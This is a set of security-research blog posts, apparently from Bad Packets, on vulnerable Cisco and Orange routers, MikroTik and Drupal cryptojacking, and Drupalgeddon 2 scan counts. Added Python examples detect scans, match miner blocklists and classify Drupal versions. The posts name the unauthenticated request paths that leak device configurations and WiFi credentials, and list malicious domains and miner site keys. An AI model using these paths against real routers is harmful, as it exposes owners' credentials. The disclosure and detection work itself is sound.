Over 9,000 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653

On Friday, January 25, 2019, our honeypots detected opportunistic scanning activity from multiple hosts targeting Cisco Small Business RV320 and RV325 routers. A vulnerability in these routers allows remote unauthenticated information disclosure (CVE-2019-1653); the credentials it leaks can then be used for remote code execution (CVE-2019-1652).

These scans consisted of a GET request for /cgi-bin/config.exp which is the path that allows unauthenticated remote users to obtain an entire dump of the device’s configuration settings. This includes the administrator credentials, however the password is hashed.

All configuration settings of the RV320/RV325 routers are exposed by this vulnerability.

Using data provided by BinaryEdge, we’ve scanned 15,309 unique IPv4 hosts and determined 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.

  • 6,247 out of 9,852 Cisco RV320 routers scanned are vulnerable
    (1,650 are not vulnerable and 1,955 did not respond to our scans)
  • 3,410 out of 5,457 Cisco RV325 routers scanned are vulnerable
    (1,027 are not vulnerable and 1,020 did not respond to our scans)
Of the vulnerable routers found, most were located in the United States.

This interactive map shows the total vulnerable hosts found per country. Overall, vulnerable devices were found in 122 countries and on the network of 1,619 unique internet service providers (autonomous systems).

These routers can be exploited further using the leaked credentials (CVE-2019-1652) resulting in remote code execution detailed in the proof-of-concept published by David Davidson (0x27).

These vulnerabilities affect Cisco RV320/RV325 routers running the affected firmware releases, and Cisco has released a patch that should be applied immediately by anyone using outdated firmware. Changing the device’s admin and WiFi credentials is also highly recommended as they may already be compromised. Cisco has published an advisory providing further details here.

Closing remarks

Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation.

Additional updates

Update 2019-01-27:
We’ve shared our findings with CIRCL and SingCERT regarding vulnerable routers in Luxembourg and Singapore, respectively.

Update 2019-01-28:
We’ve shared our findings with ACSC, the Canadian Centre for Cyber Security, CCB, CERT.at, CLCERT, NCSC and Z-CERT.

Update 2019-01-29:
We’ve shared our findings with ANSSI/COSSI/CERT-FR, CSIRT-IE, CERT-PT, and SK-CERT.

Update 2019-01-30:
Cisco PSIRT confirmed receipt of our report of vulnerable Cisco RV320/RV325 routers. We’ve also shared our findings with INCIBE-CERT.

Our honeypots detected incoming scans from new unique hosts checking for vulnerable Cisco RV320/RV325 routers.

Update 2019-01-31:
US-CERT / CISA confirmed receipt of our report and advised their Technical Analysis Branch is reviewing.

Update 2019-02-01:
We’ve shared our findings with CERT Polska.

Our honeypots detected incoming scans from a new unique host checking for Cisco RV320/RV325 routers vulnerable to CVE-2019-1653.

Over 19,000 Orange Livebox ADSL modems are leaking their WiFi credentials

On Friday, December 21, 2018, our honeypots observed an interesting scan consisting of a GET request for /get_getnetworkconf.cgi. Upon further investigation, we found this traffic was targeting Orange Livebox ADSL modems. A flaw exists in these modems that allows remote unauthenticated users to obtain the device’s SSID and WiFi password.

curl request to an affected Orange Livebox ADSL modem
A simple GET request to “/get_getnetworkconf.cgi” will reveal the Orange Livebox modem’s WiFi credentials in plaintext.
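Both posts above describe the same kind of signal: a honeypot or web server seeing a GET for a path that only makes sense against a specific device (/cgi-bin/config.exp for the Cisco RV320/RV325 configuration dump, /get_getnetworkconf.cgi for the Livebox WiFi credential leak). The detector below is an added example, not code from Bad Packets; it parses Combined Log Format lines, flags requests for those two paths, and reports the unique source hosts per signature, which is how the honeypot updates in the Cisco post count scanners. The log lines are constructed with RFC 5737 documentation addresses, and the `served_content` flag simply records whether the server answered 200, which on a real router would mean the configuration was actually handed out.

```python
"""Flag scans for the Cisco RV320/RV325 config.exp disclosure and the
Orange Livebox get_getnetworkconf.cgi leak in web-server or honeypot logs.
Added example; not part of the original post."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Request paths the posts report being probed, keyed to what a hit means.
WATCHED_PATHS = {
    "/cgi-bin/config.exp": "CVE-2019-1653 Cisco RV320/RV325 config dump",
    "/get_getnetworkconf.cgi": "CVE-2018-20377 Orange Livebox WiFi credential leak",
}

# Combined Log Format (Apache/nginx defaults); referer and UA are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Hit:
    ip: str
    timestamp: str
    path: str
    label: str
    status: int

    @property
    def served_content(self) -> bool:
        """True if the server answered 200; on a real router that is the leak."""
        return self.status == 200


def match_path(raw_path: str):
    """Return the signature label for a watched path, ignoring the query
    string and any directory a scanner prepends (e.g. /cgi-bin/ on the
    Livebox CGI). The leading slash in WATCHED_PATHS keeps endswith() from
    matching look-alike names such as /xget_getnetworkconf.cgi."""
    path = raw_path.split("?", 1)[0]
    for watched, label in WATCHED_PATHS.items():
        if path == watched or path.endswith(watched):
            return label
    return None


def scan_log(lines):
    """Parse each line; unparsable lines are skipped, not fatal."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = match_path(m["path"])
        if label:
            hits.append(Hit(m["ip"], m["ts"], m["path"], label, int(m["status"])))
    return hits


def summarize(hits):
    """Unique source hosts per signature, sorted for stable output."""
    by_label = defaultdict(set)
    for h in hits:
        by_label[h.label].add(h.ip)
    return {label: sorted(ips) for label, ips in by_label.items()}


# Constructed sample log (RFC 5737 addresses), not real honeypot data.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jan/2019:14:02:11 +0000] "GET /cgi-bin/config.exp HTTP/1.1" 404 162 "-" "curl/7.58.0"',
    '198.51.100.7 - - [21/Dec/2018:09:15:42 +0000] "GET /get_getnetworkconf.cgi HTTP/1.1" 404 162 "-" "-"',
    '192.0.2.10 - - [25/Jan/2019:14:02:12 +0000] "GET /cgi-bin/config.exp?x=1 HTTP/1.0" 200 5120 "-" "python-requests/2.21.0"',
    '203.0.113.5 - - [25/Jan/2019:14:03:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Jan/2019:14:03:01 +0000] "GET /cgi-bin/get_getnetworkconf.cgi HTTP/1.1" 404 162 "-" "-"',
    "this line is not a log entry",
]

if __name__ == "__main__":
    for label, ips in summarize(scan_log(SAMPLE_LOG)).items():
        print(f"{label}: {len(ips)} unique source host(s): {', '.join(ips)}")
```

Feed it real access logs by passing an open file object instead of SAMPLE_LOG; counting unique sources rather than raw requests is what separates a handful of scanners from noise when the same host retries.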

To assess the amount of devices vulnerable to this flaw, we obtained a list of Orange Livebox modems from Shodan.

Of the 30,063 IPv4 hosts found, our scans revealed:

  • 19,490 leaking their WiFi credentials (SSID/password) in plaintext
  • 2,018 not leaking any information, but still exposed to the internet
  • 8,391 not responding to our scans

Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default “admin/admin” credentials are still applied.

Example Livebox modem status page
Poorly secured Livebox modems enable remote users to view the customer’s phone number, the name/MAC address of all connected clients, and more.

This allows any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.

Unsurprisingly, the vast majority of affected devices were found to be on the network of Orange Espana (AS12479).

Total affected Livebox modems

Initial scan source


The initial scan detected by our honeypots came from an IP address associated with a Telefonica Spain customer. While we can only guess what the motive was behind these scans, it’s interesting that the source is physically closer to the affected Livebox ADSL modems than, say, a threat actor in another country. This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.

Closing remarks

Due to the sensitive nature of this flaw, the IP addresses of affected Orange Livebox ADSL modems will not be published publicly; however, the list is freely available for law enforcement and CERT teams to review. We’ve shared our findings directly with Orange Espana, Orange-CERT, and CCN-CERT for further investigation and remediation.

Update 4:00 AM PT: Orange-CERT has acknowledged our report and is investigating further.

Update 6:00 PM PT: CVE-2018-20377 has been assigned for the flaw described in this post.

Update 2018-12-25: These Orange Livebox Arcadyan ARV7519 modem firmware versions appear to be patched against the “/get_getnetworkconf.cgi” flaw that leaks WiFi credentials:

  • 00.96.807
  • 00.96.322

These versions are not patched and are vulnerable to CVE-2018-20377:

  • 00.96.321S
  • 00.96.217

Update 2018-12-29: Nearly 15,000 Orange Livebox Arcadyan ARV7519 modems have been patched against CVE-2018-20377.

200,000+ MikroTik routers worldwide have been compromised to inject cryptojacking malware

Over the last two months, the Bad Packets LLC team has been monitoring over 80 unique cryptojacking campaigns targeting vulnerable MikroTik routers. The latest statistics available from Censys and Shodan confirm hundreds of thousands of devices remain compromised.

These MikroTik routers are being compromised by miscreants exploiting CVE-2018-14847, a critical vulnerability that affects all versions of RouterOS through 6.42. A patch was issued earlier this year by MikroTik, however the latest statistics (above) reveal device owners and network operators have chosen not to apply it.

Ali Mosajjal provides an excellent discussion of this vulnerability and how it’s exploited here. Another post, by Simon Kenin, explains how the first cryptojacking campaigns targeted over 170,000 MikroTik routers in Brazil alone. Kenin described it best when he stated:

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.”

Despite the warnings from Mosajjal and Kenin, numerous MikroTik routers worldwide remain compromised. Looking strictly at Coinhive infections alone, we clearly see the unfortunate truth.

However, Coinhive isn’t the only type of cryptojacking malware being injected via these compromised routers. Looking at all the campaigns noted in the MikroTik Cryptojacking Campaigns spreadsheet, we find some interesting contenders.

Coinhive is clearly the dominant choice of miscreants looking for cryptojacking victims.

While Coinhive is used in the vast majority of cryptojacking campaigns, it is not used by the largest campaign. Instead, CoinImp is used in a campaign consisting of 115,000 MikroTik routers, per the latest Censys results. A large share of compromised devices are found on the network of two service providers in Iran, AS59566 and AS56616.

In this campaign, CoinImp is injected via https://srcip[.]com/src.js which embeds an iframe pointing to https://srcip[.]com/js.html which contains the cryptocurrency mining JavaScript code.

CoinImp is injected via https://www.hostingcloud[.]science./M5q5.js
Twitter user @VriesHd raises a good point that despite clear evidence, no AV company has flagged the domain or URL as malicious. Fortunately, users of the CoinBlockerLists are protected as all domains mentioned in this post and the IOC spreadsheet are included.

Another cryptojacking campaign seemingly running rampant was discovered earlier in September.

In this case, the cryptojacking malware appears to be injecting MinerAlt, a service that mines CryptoNight coins (Monero, Electroneum, etc.) while taking 30% of the revenue of their users. Unlike Coinhive, the websocket traffic is not in plain text (shown in tweet above).

Infected routers in this campaign are configured to throttle the CPU usage of the victims’ devices in a likely attempt to reduce detection. In the example shown below, the amount of CPU power used for mining cryptocurrency is roughly 80%.

United States cryptojacking campaigns

Looking specifically at compromised MikroTik routers in the United States, a few troubling cryptojacking campaigns were found. On August 25, nearly 3,000 compromised routers with IP addresses assigned to Cogent Communications were located on Censys.

Almost a month later, another surprising cryptojacking campaign was discovered. This new campaign included over 600 MikroTik routers on the network of Douglas County Public Utility District in north central Washington state. Their network, AS27373, has been allocated 1,792 IPv4 addresses and the latest Censys results show 703 IPs consisting solely of MikroTik routers. In other words, 39% of the IPs they manage route to a compromised device.

Upon reviewing these findings, I notified US-CERT (NCCIC) in addition to other members of federal law enforcement, as these routers are on the network of a public energy co-operative. While I never received confirmation that an NCCIC incident number was assigned, I was told by the NCCIC to continue to send in similar reports in the future.

It’s alarming to see so many devices on a public utility’s network compromised, so I hope the NCCIC is able to provide them with guidance and/or assistance with the remediation process.

The latest results found on Censys indicate cryptojacking campaigns targeting vulnerable MikroTik routers in the United States are not slowing down. Many Wireless Internet Service Providers (WISPs) appear to be affected, as numerous compromised devices can be found on their networks.


Instead of listing each IOC here, I have placed them in the MikroTik cryptojacking campaigns spreadsheet that lists each site key used for every campaign and includes notes on how the malware is injected.

Thanks to Censys for providing me with the API credits needed to keep this list frequently updated.

Closing remarks

As I recently told Threatpost, scraping for pennies with Coinhive is not the worst-case scenario that miscreants can do with these compromised MikroTik routers. The report published by Netlab 360 illustrated how they can be used for much more nefarious purposes such as eavesdropping on all traffic passing through them.

MikroTik users need to ensure they’re running the latest version of RouterOS which has patched CVE-2018-14847. Anyone using version 6.42 or older should apply the update ASAP, available here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I’ve also coauthored a peer-reviewed research paper, A first look at browser-based cryptojacking.

As always, I’m most active on Twitter — please follow @bad_packets for the latest updates.

Author’s note

The statistics shared in this post were accurate as of September 28, 2018. Since then, the amount of compromised MikroTik routers worldwide has greatly increased. The latest totals reveal over 400,000 have been hacked by miscreants.

How to stop cryptojacking and the theft of your computing resources

Cryptojacking is defined as hijacking your desktop / laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive: unless the operator throttles the miner, malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.

High CPU usage caused by cryptojacking can be observed using the Task Manager.

Mined hashes are sent via a WebSocket connection to a mining pool or a service provider such as Coinhive. While Coinhive remains the market leader, I previously documented how to find other forms of cryptojacking malware that have grown in popularity.

Coinhive websocket traffic shown in Fiddler.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.


I recommend using MinerBlock to stop cryptojacking in your browser. This is an easy solution which requires no additional configuration out of the box. MinerBlock prevents cryptojacking using two methods: a frequently updated blacklist and detection of JavaScript executing cryptomining behavior. It’s available for Chrome, Firefox, and is open source.


Another effective method to stop cryptojacking is at the network level (firewall) to prevent the malicious code from reaching your endpoints. I recommend using the CoinBlockerLists for this purpose. These lists are constantly updated as new malicious domains are frequently found.

The lists are available in various formats to easily integrate with your existing solution. A FireHOL feed is also available. For MacOS users, this guide illustrates how the CoinBlockerLists can be implemented using firewall software Little Snitch. Other methods such as DNS filtering using Pi-hole can be used with the CoinBlockerLists.
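Whether the CoinBlockerLists are loaded into Pi-hole, Little Snitch or a firewall, the matching rule is the same: a host is blocked if it or any parent domain is listed, and the comparison has to respect DNS label boundaries so that `notcoinhive.com` does not match `coinhive.com`. The code below is an added example (not CoinBlockerLists' own tooling) that loads a list in either plain domain-per-line or hosts-file form, extracts the script and WebSocket endpoints a page would contact, and reports which of them the list would block. The blocklist and HTML are constructed for the example.

```python
"""Match a page's script/WebSocket endpoints against a CoinBlockerLists-style
domain list on DNS label boundaries. Added example, not part of the post."""
import re
from urllib.parse import urlparse


def load_blocklist(text: str) -> set:
    """Accept 'domain' or hosts-file '0.0.0.0 domain' lines; '#' starts a comment."""
    domains = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        # Last whitespace-separated field is the hostname in both formats.
        domains.add(line.split()[-1].lower().rstrip("."))
    return domains


def is_blocked(host: str, blocklist: set) -> bool:
    """True if host or any parent domain is listed. Compare whole labels:
    a plain suffix test would let 'notcoinhive.com' match 'coinhive.com'."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


SRC_RE = re.compile(r"""<script\b[^>]*\bsrc=["']([^"']+)["']""", re.IGNORECASE)
WS_RE = re.compile(r"""wss?://[^\s"'<>]+""", re.IGNORECASE)


def page_endpoints(html: str) -> set:
    """Hostnames from <script src> attributes and ws:// / wss:// URLs in the page."""
    hosts = set()
    for url in SRC_RE.findall(html) + WS_RE.findall(html):
        if url.startswith("//"):          # protocol-relative script source
            url = "https:" + url
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    return hosts


def blocked_endpoints(html: str, blocklist: set) -> list:
    return sorted(h for h in page_endpoints(html) if is_blocked(h, blocklist))


# Constructed blocklist in the hosts-file style, not the real CoinBlockerLists.
SAMPLE_BLOCKLIST = """
# constructed sample
coinhive.com
0.0.0.0 coin-hive.com
0.0.0.0 hostingcloud.science   # trailing comment
"""

# Constructed page: one real-looking miner include, one legitimate CDN script,
# one look-alike domain that must not match, and an inline WebSocket call.
SAMPLE_HTML = """
<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script type="text/javascript" src="//cdn.example.org/jquery.js"></script>
<script src="https://notcoinhive.com/lib.js"></script>
<script>var ws = new WebSocket('wss://ws001.coinhive.com/proxy');</script>
</head></html>
"""

if __name__ == "__main__":
    bl = load_blocklist(SAMPLE_BLOCKLIST)
    print("blocked:", blocked_endpoints(SAMPLE_HTML, bl))
```

Feeding `load_blocklist` the downloaded list and `page_endpoints` a saved copy of a suspect page gives a quick offline answer to "would my filter have stopped this"; the same `is_blocked` rule is what a DNS sinkhole applies per query.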

Resource monitoring

As an independent security researcher, I don’t recommend a specific endpoint protection product for enterprises. Many antivirus / antimalware products such as Malwarebytes, ESET, Avast, Kaspersky, and Windows Defender will block most forms of cryptojacking and coinmining malware.

Even with some form of AV protection, resource monitoring of your on-premise and cloud infrastructure is critical. High CPU usage over a sustained period of time is the most apparent indicator of compromise in cases of cryptojacking. Consuming excessive computational resources will increase your cloud service provider bills and energy (electricity) costs.


Personally, I use PRTG for all my monitoring needs. Paessler recently published a case study featuring my use of PRTG to monitor cryptojacking incidents. The impact of resource abuse and theft highlights the importance of monitoring. PRTG is free to use up to 100 sensors and can be downloaded here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I also coauthored a research paper, A first look at browser-based cryptojacking, for further reading on this topic.

As always, I’m most active on Twitter — follow me @bad_packets.

Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from votrepolice.be and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s Office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also set up PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One example found in the campaign had upgraded their Drupal version to the latest version without removing the malicious content. As noted by the Drupal Security Team PSA, “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.


Domain / URLs
upgraderservices[.]cf

Coinhive Site Keys
ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos (terminated by Coinhive)
0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publicly accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version of Drupal. Using an outdated content management system (CMS) is never best practice.
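The methodology described earlier in this post (a site is counted as not vulnerable if its public CHANGELOG.txt advertises at least Drupal 7.58, vulnerable if it advertises an older 7.x release, and unknown if the version cannot be read) and the caveat above come down to a small version check. The code below is an added example, not the scanner used for the post; it parses the release headers Drupal 7 writes at the top of CHANGELOG.txt ("Drupal 7.57, 2018-02-21"), takes the newest release listed, and sorts each site into the same three buckets. The sample responses are constructed. As the update notes, a 200 response with an old version proves only that the site is outdated: a site patched with the standalone SA-CORE-2018-002 fix keeps its old CHANGELOG.txt and still lands in the vulnerable bucket.

```python
"""Sort Drupal 7 sites into vulnerable / not vulnerable / unknown buckets for
CVE-2018-7600 from the version their public CHANGELOG.txt advertises.
Added example, not the scanner used for the post."""
import re
from collections import Counter

# First Drupal 7 release carrying the SA-CORE-2018-002 fix.
PATCHED_D7 = (7, 58)

# Each release entry in Drupal 7's CHANGELOG.txt starts a line such as
# "Drupal 7.57, 2018-02-21" (pre-releases look like "Drupal 7.0-rc4, ...").
ENTRY_RE = re.compile(r"^Drupal (\d+)\.(\d+)[\w.-]*,", re.MULTILINE)


def changelog_version(text: str):
    """(major, minor) of the newest release listed, or None if no entry parses.
    The newest entry is normally first, but take the max rather than trust order."""
    found = [(int(major), int(minor)) for major, minor in ENTRY_RE.findall(text)]
    return max(found) if found else None


def classify(status: int, body: str) -> str:
    """'not vulnerable' if CHANGELOG.txt advertises >= 7.58, 'vulnerable' if it
    advertises an older 7.x release, otherwise 'unknown' (blocked, missing,
    custom 404 page served with 200, or not a Drupal 7 changelog at all).
    A backported mitigation patch leaves the version untouched, so a
    'vulnerable' verdict means 'outdated', not 'confirmed exploitable'."""
    if status != 200 or not body:
        return "unknown"
    version = changelog_version(body)
    if version is None or version[0] != 7:
        return "unknown"
    return "not vulnerable" if version >= PATCHED_D7 else "vulnerable"


def tally(responses) -> Counter:
    """Bucket counts over (status, body) pairs, one per site."""
    return Counter(classify(status, body) for status, body in responses)


# Constructed CHANGELOG.txt excerpts in Drupal 7's format, not fetched from any site.
CHANGELOG_758 = """Drupal 7.58, 2018-03-28
-----------------------
- Fixed security issues (remote code execution). See SA-CORE-2018-002.

Drupal 7.57, 2018-02-21
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2018-001.
"""

CHANGELOG_756 = """Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.

Drupal 7.0-rc4, 2010-12-20
--------------------------
- Release candidate.
"""

# Constructed (status, body) responses for four hypothetical sites.
SAMPLE_RESPONSES = {
    "patched.example": (200, CHANGELOG_758),
    "outdated.example": (200, CHANGELOG_756),
    "blocked.example": (403, ""),
    "custom404.example": (200, "<html><title>Page not found</title></html>"),
}

if __name__ == "__main__":
    for site, (status, body) in SAMPLE_RESPONSES.items():
        print(f"{site}: {classify(status, body)}")
    print(dict(tally(SAMPLE_RESPONSES.values())))
```

The "unknown" bucket is large in practice for exactly the reasons the sample covers: hosts that deny or rewrite requests for CHANGELOG.txt, and sites that answer every path with a 200 and a custom error page.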

Closing Remarks

While the amount of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IOCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd[.]com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that the IOCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references to the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using a regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IOCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these sites were all running outdated and vulnerable versions of the Drupal content management system.

The affected sites varied by hosting provider and country, and no specific one appeared to be targeted. The largest number of unique domains were found in the United States and were hosted by Amazon.

Unique domains found by country
Unique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency

Government of Chihuahua, Mexico

City of Marion, Ohio

Arizona Board of Behavioral Health Examiners

Social Security Institute of the State of Mexico and Municipalities

Turkish Revenue Administration – Aydın Tax Office

Procalidad – “The Project Improvement of Higher Education Quality” – Peru

Matzikama Municipality

UMBRIA Special Reconstruction Office


University / school sites affected

University of Aleppo

College of Biblical Studies

IOHANES – University of Balamand

Ringling College of Art and Design

Vidyalankar Institute of Technology

University of Batangas

Asia Pacific Institute of Information Technology (APIIT)

Management Development Institute of Singapore in Tashkent

Islamic Azad University of the Semnan branch

Tan Dan Secondary School


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, some sites, such as the Office of Inspector General of the EEOC, reference the non-secure (http://) version of the script from an HTTPS page. Browsers refuse to run such mixed-content scripts, so this is yet another blunder that hinders the effectiveness of this cryptojacking campaign as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story.



https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

Loader variant 1 (plain http:// reference; property names hidden as \xHH escapes):

